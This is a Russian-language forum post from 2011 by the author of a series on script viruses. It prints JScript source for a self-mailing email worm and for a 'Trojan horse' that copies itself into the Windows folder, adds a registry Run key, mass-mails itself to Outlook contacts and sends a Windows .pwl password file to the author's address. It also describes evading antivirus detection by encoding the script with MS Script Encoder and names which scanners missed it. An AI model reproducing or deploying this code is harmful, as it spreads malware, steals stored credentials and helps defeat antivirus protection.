Dr_Web | Дата: Среда, 07.09.2011, 12:20 | Сообщение # 1 |
1
Группа: Пользователи
Сообщений: 105
Статус: Offline
| Часть 2. - Исследование новых возможностей В ходе написания первой статья я столкнулась с проблемами при тестировании написанных скриптов, установленный AVP Script Checker на любую попытку сохранить файл с командами копирования файла с локальной машины, пересылки через электронную почту, попытки прочитать реестр, выдавал сообщение о наличии в этом файле новых модификаций различных вирусов. Создавалось впечатление, что AVP надежно стоит на страже наших интересов, и я решила проверить, действительно ли это так?
При изучении документации к Windows Scripting Host(WSH), я обратила внимание на абзац где было сказано, что корпорацией Microsoft был создан независимый от языка скрипт – хост, который позволял строить аналоги .bat файлов на VBScript, JScript и других скриптовых языках, например, Active Perl или Python. На их сайте про Active Perl или Python ничего сказано не было но про JScript было написано довольно подробно, сравнив возможности VBScript и JScript, стало понятно, что они идентичны и отличаются только синтаксисом языка.
Переписать скрипт с одного языка программирования в другой было делом техники, в результате получилось:
Каркас E-mail worm var fileSysObject, file; fileSysObject = new ActiveXObject("Scripting.FileSystemObject"); file = fileSysObject.GetFile(WScript.ScriptFullName); var outlookObject, outMail, index; outlookObject = new ActiveXObject("Outlook.Application"); for (index = 1; index < 50; index++){ outMail = outlookObject.CreateItem(0); outMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index); outMail.Subject = "Тема сообщения"; outMail.Body = "Тело сообщения"; OutMail.Attachments.Add(WScript.ScriptFullName); outMail.Send;}
Каркас "троянского коня" var fileSysObject, file; fileSysObject = new ActiveXObject("Scripting.FileSystemObject"); file = fileSysObject.GetFile(WScript.ScriptFullName); file.Copy("c:windowsI_am_virus.vbs"); var wshShell; wshShell = new ActiveXObject("WScript.Shell"); wshShell.RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWindows _ CurrentVersionRunServicesvirus", "c:windowsI_am_virus.vbs"); var outlookObject, outMail, index; outlookObject = new ActiveXObject("Outlook.Application"); for (index = 1; index < 50; index++){ outMail = outlookObject.CreateItem(0); outMail.to = OutlookObject.GetNameSpace("MAPI").AddressLists(1).AddressEntries(index); outMail.Subject = "Тема сообщения"; outMail.Body = "Тело сообщения"; OutMail.Attachments.Add(WScript.ScriptFullName); outMail.Send;} outMail = outlookObject.CreateItem(0); outMail.to = "Ваш E-mail"; outMail.Subject = "Тема сообщения"; outMail.Body = "Тело сообщения"; outMail.Attachments.Add("Путь к .pwl файлу"); outMail.Send;
AVP молчал
Однако при выполнении скрипта Script Checker выдал сообщение, что этот файл возможно содержит вирус и заблокировал его выполнение. Покопавшись еще я выяснила, что он реагирует на попытку отослать файл по почте, так как и в VBScript, и в JScript строка OutMail.Attachments.Add(WScript.ScriptFullName) выглядит одинаково. Избавиться от этого удалось, закодировав скрипт программой MS Windows Script Encoder.
Скрипт был проверен на трех самых распространенных антивирусных программах Norton AntiVirus, AVP и Dr.Web. Первые две успешно промолчали, и только Dr.Web, отфильтровал его, как потенциально опасный, сработал знаменитый эвристический анализатор.
На основе сделанного анализа можно предположить, что нас ждет следующий виток эпидемий связанных с написанием вирусов на JScript.
моя новая почта dr.web597278899@mail.ru и моя новая ася 636311100
|
|
| |